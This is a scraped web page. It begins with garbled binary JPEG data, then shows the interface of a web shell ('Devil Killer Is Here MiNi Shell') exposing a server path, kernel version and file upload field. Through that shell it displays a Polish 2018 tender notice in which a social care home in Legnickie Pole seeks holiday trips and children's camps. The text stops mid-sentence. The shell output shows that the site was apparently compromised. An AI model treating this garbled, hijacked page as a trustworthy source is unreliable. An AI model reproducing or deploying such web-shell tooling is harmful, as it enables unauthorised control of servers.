JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20180216/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20180216/519432-N-2018.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 519432-N-2018 z dnia 2018-02-16 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Dom Pomocy Społecznej w Legnickim Polu</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Organizacja wypoczynku</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Usługi</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Dom Pomocy Społecznej w Legnickim Polu</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon"></span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Benedyktynów</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">4</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">59241 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Legnickie Pole</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">dolnośląskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">76 858-23-87 w. 140</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">sekretariat@dpslp.org.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax"></span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">http://www.dpslp.nbip.pl/dpslp/</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Jednostki organizacyjne administracji samorządowej</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">http://www.dpslp.nbip.pl/dpslp/</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja"></span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">1) za pośrednictwem operatora pocztowego, 2)osobiście lub przez posłańca</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Sekretariat, Dom Pomocy Społecznej w Legnickim Polu, ul. Benedyktynów 4, 59-241 Legnickie Pole, w godz.: 7.00-15.00.</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Organizacja wypoczynku</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">GŻ/230-2-3/18</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Usługi</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Przedmiotem zamówienia jest: usługa organizacji wypoczynku dla pracowników Domu Pomocy Społecznej w Legnickim Polu i ich rodzin w 2018. Na zadanie składa się: a)zorganizowanie 8-dniowej wycieczki do Hiszpanii, w Region Costa Brava w terminie 30.04-07.05.2018 r. dla 54 osób.1. Przewidywana liczba uczestników: 54-oznacza maksymalną liczbę uczestników.2. Miejsce wypoczynku: Region: Hiszpania-Costa Brava.3. Termin wypoczynku: 30.04-07.05.2018 r.czas trwania: 8 dni4. Rodzaj transportu: Wykonawca zapewni przelot samolotem (w dwie strony)-wylot możliwy z Berlina, Warszawy, Krakowa, Katowic lub Poznania oraz powrót do Berlina, Warszawy, Krakowa, Katowic lub Poznania. Wykonawca zapewni dojazd z Legnicy do lotniska (autokar lub bus) oraz dojazd z lotniska do hotelu (autokar lub bus) oraz w drodze powrotnej z hotelu na lotnisko w Hiszpanii (autokar lub bus) i po wylądowaniu z lotniska do Legnicy (autokar lub bus). Wszystkie przewozy będą zorganizowane w czasie optymalnym do dokonania niezbędnych formalności na lotnisku oraz umożliwiającym punktualny wylot. 5.Wyżywienie: Wykonawca zapewni w trakcie pobytu usługę ,,All Inclusive" (śniadania, obiady i kolacje, przekąski w ciągu dnia, lokalne napoje alkoholowe i bezalkoholowe).6. Zakwaterowanie: Wykonawca zapewni uczestnikom 7 noclegów w hotelu minumum 3 * (3 gwiazdkowym) położonym w Regionie Costa Brava, z basenem, max. 500 m od plaży, w pokojach 2 osobowych z pełnym węzłem sanitarnym, klimatyzacją, dostępem do bezpłatnego internetu i telewizji.7. Opieka: organizator wypoczynku jest zobowiązany do zapewnienia opieki rezydenta polskojęzycznego podczas pobytu, a jeżeli wylot nastąpi z lotniska zagranicznego to również pilota, która odwiezie grupę na lotnisko i pomoże w odprawie na lotnisku.8. Transport uczestników wypoczynku powinien zostać zorganizowany z uwzględnieniem wymagań określonych w ustawie z dnia 6 września 2001 roku o transporcie drogowym (tekst jednolity Dz.U. 2016 poz. 1907).a) wyjazd na wycieczkę oraz powrót nastąpią o godzinach wskazanych w programach przez Wykonawcę.b)Wykonawca zapewni ubezpieczenie autokaru/busa;c) w przypadku awarii autokaru podstawienie autokaru zastępczego nastąpi na koszt Wykonawcy.9. Ubezpieczenie: Wykonawca zapewni uczestnikom wypoczynku ubezpieczenie NNW (od następstw nieszczęśliwych wypadków) zarówno na czas pobytu, jak i czas podróży, KL (koszty leczenia) oraz BP (bagażu). Ubezpieczenie obejmuje okres momentu rozpoczęcia wycieczki do momentu przyjazdu z wycieczki do Legnicy.10. W ramach usługi Wykonawca zapewni uczestnikom opłatę za bagaż podręczny (8-10 kg) oraz dwie sztuki bagażu po 20 kg na cała grupę w obie strony. b) zorganizowanie kolonii w Mrzeżynie w dniach 17-28.07.2018 r. dla 10 osób.1. Przewidywana liczba uczestników: 10 oznacza maksymalna liczbę uczestników. Podana przez Zamawiającego liczba jest liczbą przewidywaną. Rzeczywista liczba skierowań, wynikająca z aktualnych potrzeb Zamawiającego, zostanie podana Wykonawcy na 14 dni przed planowanym wyjazdem.2. Miejsce wypoczynku/zwiedzania: Mrzeżyno i okolice.3. Termin wypoczynku: 17-28.07.2018 r.Liczba turnusów: 1, czas trwania: 12 dni. Ilość: 11 noclegów.4.Zakwaterowanie: a) Zamawiający nie dopuszcza, aby zakwaterowanie odbywało się w obiekcie używanym okazjonalnie do wypoczynku (np. szkoły, remizy, domy parafialne itp.). Akceptowane będą obiekty hotelowe lub inne obiekty, w których są świadczone usługi hotelarskie. Wymogi jakim muszą odpowiadać obiekty reguluje rozporządzenie Ministra Gospodarki i Pracy z dnia 19 sierpnia 2004 r. w sprawie obiektów hotelarskich i innych obiektów, w których są świadczone usługi hotelarskie (tekst jednolity Dz. U. 2006 nr 22 poz.169 z późn. zm)b) Zamawiający zastrzega jednak, że nie dopuszcza zakwaterowania w domkach kempingowych i namiotach.c) Minimalne wymogi w zakresie budynków, w których będą zakwaterowani uczestnicy kolonii:-obiekt murowany z zapleczem sanitarnym i sportowym, ogrodzony.- zakwaterowanie wszystkich uczestników w jednym budynku;- obiekt powinien być wyposażony w salę TV, salę wypoczynkową, salę gimnastyczną oraz plac zabaw i rekreacji.- obiekt z własna kuchnia i stołówką.- obiekt powinien znajdować się maksymalnie 800 m od morza, - teren powinien być strzeżony 24 h na dobę.d) Pokoje dla uczestników powinny spełniać wymogi:- pokoje max.3-5 osobowe z pełnym węzłem sanitarnym wyposażone w natryski i wc, ciepłą wodę dostępną bez ograniczeń,- nie dopuszcza się łóżek piętrowych.e) na terenie ośrodka internet Wi-Fi5.Wyżywienie: a) Zamawiający wymaga zapewnienia wyżywienia w ośrodku w postaci: 4 posiłków dziennie: śniadanie, obiad, podwieczorek i kolacja. Napoje dostępne 24h/dobę.b) pierwszym posiłkiem w ośrodku będzie obiado-kolacja w dniu przyjazdu, ostatnim posiłkiem jest śniadanie w dniu wyjazdu.c) na drogę powrotną uczestnicy otrzymają suchy prowiant (w tym napoje).d) posiłki powinny być urozmaicone i odpowiadać normom żywienia opracowanym przez Instytut Żywności i Żywienia zarówno pod względem ilości, jak i jakości oraz wartości odżywczych, a także bogate w witaminy, owoce i warzywa.6.Wymogi odnośnie programu kolonii/obozu:a) Całodzienna wycieczka do Kołobrzegu: zwiedzanie miasta i portu (,,Pomnik Zaślubin z morzem", Latarnia Morska, molo, Ratusz, Starówka), zabawy animacyjne o tematyce morza- 2 godz., rejs statkiem Wikingów po morzu.b) Całodzienna wycieczka do Wolińskiego Parku Narodowego (atrakcje w miejscowościach: Niechorze - latarnia morska, klif; Trzęsacz - ruiny kościoła, Muzeum Multimedialne ,,Na 15 południku", Woliński Park Narodowy - punkt widokowy na Wzgórzu Gosań, Międzyzdroje - promenada, Aleja Gwiazd, molo, Wapnica - jezioro Turkusowe, wzgórza: Wolińskie i Lubińskie).c) Wycieczka do Rogowa - Fort Rogowo d) Zajęcia sportowo-rekreacyjne (zawody sportowe, zabawy terenowe, wycieczki piesze, konkursy)e) Dyskoteki, ognisko z kiełbaskami.f) Kąpiele morskie i słoneczne.g) Udział w imprezach kulturalno-sportowych organizowanych na terenie Mrzeżyna.h) Dla uczestników zawodów i konkursów dyplomy, dla zwycięzców nagrody.7.Opieka: a) organizator wypoczynku jest zobowiązany do zapewnienia właściwej opieki uczestnikom wypoczynku, w szczególności: całodobowej opieki doświadczonej kadry zgodnie z przepisami MEN;b) dostęp do całodobowej opieki pielęgniarskiej, lekarskiej - dyżur pod telefonem, c) opiekę wychowawcy, opiekę kierownika kolonii oraz animatora zajęć,d) opiekę ratownika morskiego na plaży, e) pokoje wychowawców i dzieci muszą być usytuowane na tym samym piętrze. W przypadku zakwaterowania uczestników kolonii na sąsiadujących kondygnacjach na każdej z nich musi znajdować się pokój wychowawców.8. Transport uczestników wypoczynku powinien zostać zorganizowany z uwzględnieniem wymagań określonych w ustawie z dnia 6 września 2001 roku o transporcie drogowym (tekst jednolity Dz.U. 2016 poz. 1907),a) wyjazd na kolonię nastąpi 17.07. 2018 r. z Legnicy, powrót 28.07.2018 r. do Legnicy.b)Wykonawca zapewni uczestnikom kolonii/obozu transport komfortowym, autokarem/busem z nawiewem (nie starszym niż 5 lat).c) Wykonawca zapewni opiekę doświadczonej kadry nad dziećmi w czasie przejazdu, zgodnie przepisami MEN,d) ubezpieczenie autokaru,e) w przypadku awarii autokaru podstawienie autokaru zastępczego nastąpi na koszt Wykonawcy. 9. Ubezpieczenie: uczestnicy wypoczynku muszą mieć zapewnione ubezpieczenie od następstw nieszczęśliwych wypadków i kosztów leczenia zarówno na czas pobytu, jak i czas podróży. Ubezpieczenie obejmuje okres momentu przekazania dzieci pod opiekę wychowawców w miejscu zbiórki do momentu odebrania dzieci przez opiekunów/rodziców po powrocie z wypoczynku. 10. Dodatkowe wymagania:Wykonawca zapewni bilety wstępów do zwiedzanych obiektów, opłaty za przewozy i przewodników oraz opłaty klimatyczne. c) zorganizowanie kolonii/obozu w Hiszpanii w dniach 11.07-22.07.2018 r. dla 33 osób.1. Przewidywana liczba uczestników: 33 oznacza maksymalna liczbę uczestników. Podana przez Zamawiającego liczba jest liczbą przewidywaną. Rzeczywista liczba skierowań, wynikająca z aktualnych potrzeb Zamawiającego, zostanie podana Wykonawcy na 21 dni przed planowanym wyjazdem.2. Miejsce wypoczynku/zwiedzania: Hiszpania-Region Costa Brava-miejscowość- Lloret de Mar, Francja- Paryż.3. Termin wypoczynku: 11.07-22.07.2018 r.Liczba turnusów: 1, czas trwania: 12 dni. Ilość: 8 noclegów (1 w okolicach Paryża, 7 w hotelu w Lloret de Mar).4.Zakwaterowanie: a) Zamawiający nie dopuszcza, aby zakwaterowanie odbywało się w obiekcie używanym okazjonalnie do wypoczynku (np. szkoły, remizy, domy parafialne itp.). Akceptowane będą obiekty hotelowe lub inne obiekty, w których są świadczone usługi hotelarskie. Wymogi jakim muszą odpowiadać obiekty reguluje rozporządzenie Ministra Gospodarki i Pracy z 19.08. 2004 r. w sprawie obiektów hotelarskich i innych obiektów, w których są świadczone usługi hotelarskie ( Dz.U. z 2006 r. Nr 22, poz.169). b) Zamawiający zastrzega jednak, że nie dopuszcza zakwaterowania w domkach kempingowych i namiotach.c) Minimalne wymogi w zakresie budynków, w których będą zakwaterowani uczestnicy obozu:\- hotel o standardzie min. 3*w miejscowości Lloret De Mar.- zakwaterowanie wszystkich uczestników w jednym budynku;- obiekt powinien być wyposażony w salę TV, salę wypoczynkową.- restauracja na terenie budynku;- obiekt powinien znajdować się maksymalnie do 400 m od morza;- teren powinien być strzeżony 24 h na dobę.d) Pokoje dla uczestników powinny spełniać wymogi:- pokoje klimatyzowane max.3-4 osobowe z pełnym węzłem sanitarnym wyposażone w natryski i wc, ciepłą wodę dostępną bez ograniczeń,- nie dopuszcza się łóżek piętrowych.e) podczas noclegów tranzytowych Zamawiający dopuszcza noclegi w hotelach 2 lub 3 *.5.Wyżywienie: a) Zamawiający wymaga zapewnienia wyżywienia w hotelu w miejscowości Lloret de Mar. 3 posiłków dziennie: śniadanie, obiad, i kolacja. Napoje dostępne 24h/dobę.b) pierwszym posiłkiem w hotelu będzie kolacja w dniu przyjazdu, ostatnim posiłkiem jest obiad w dniu wyjazdu.c) na drogę powrotną uczestnicy otrzymają suchy prowiant (w tym napoje).d) posiłki powinny być urozmaicone i odpowiadać normom żywienia opracowanym przez Instytut Żywności i Żywienia zarówno pod względem ilości, jak i jakości oraz wartości odżywczych, a także bogate w witaminy, owoce i warzywa.e) w przypadku uczestnictwa w wycieczkach fakultatywnych Wykonawca zapewni uczestnikom paczki z prowiantem i wodą.6.Program kolonii/obozu:Dzień 1: Wyjazd z Legnicy w godzinach popołudniowych. Przejazd przez Niemcy, Francję. Dzień 2:śniadanie w formie suchego prowiantu. Przyjazd do Paryża w godzinach rannych; przejazd do EuroDisneylandu -całodzienna zabawa w n parku rozrywki. Obiadokolacja. Przejazd do hotelu na nocleg.Dzień 3:Śniadanie kontynentalne; przejazd na całodzienne zwiedzanie Paryża. Spacer z pilotem na trasie: wieża Eiffel'a, Łuk Triumfalny, Pola Elizejskie, Luwr, Les Halles, Centrum Pompidou, wyspa La Cite, katedra Notre Damme. Obiadkolacja, w godzinach wieczornych wyjazd do Hiszpanii. Nocny przejazd przez Francję.Dzień 4:	Przyjazd do Hiszpanii, przejazd do hotelu w godzinach popołudniowych, zakwaterowanie, kolacja, nocleg.Dzień 5-10: Wypoczynek, plażowanie, możliwość uczestniczenia w wycieczkach fakultatywnych. Dzień 11: Śniadanie, wykwaterowanie z pokoi. Obiad; odbiór suchego prowiantu na drogę powrotną. Wyjazd z Hiszpanii w godzinach popołudniowych. Przejazd przez Francję, Niemcy. Dzień 12:Przyjazd na miejsce zbiórki do Legnicy w godzinach 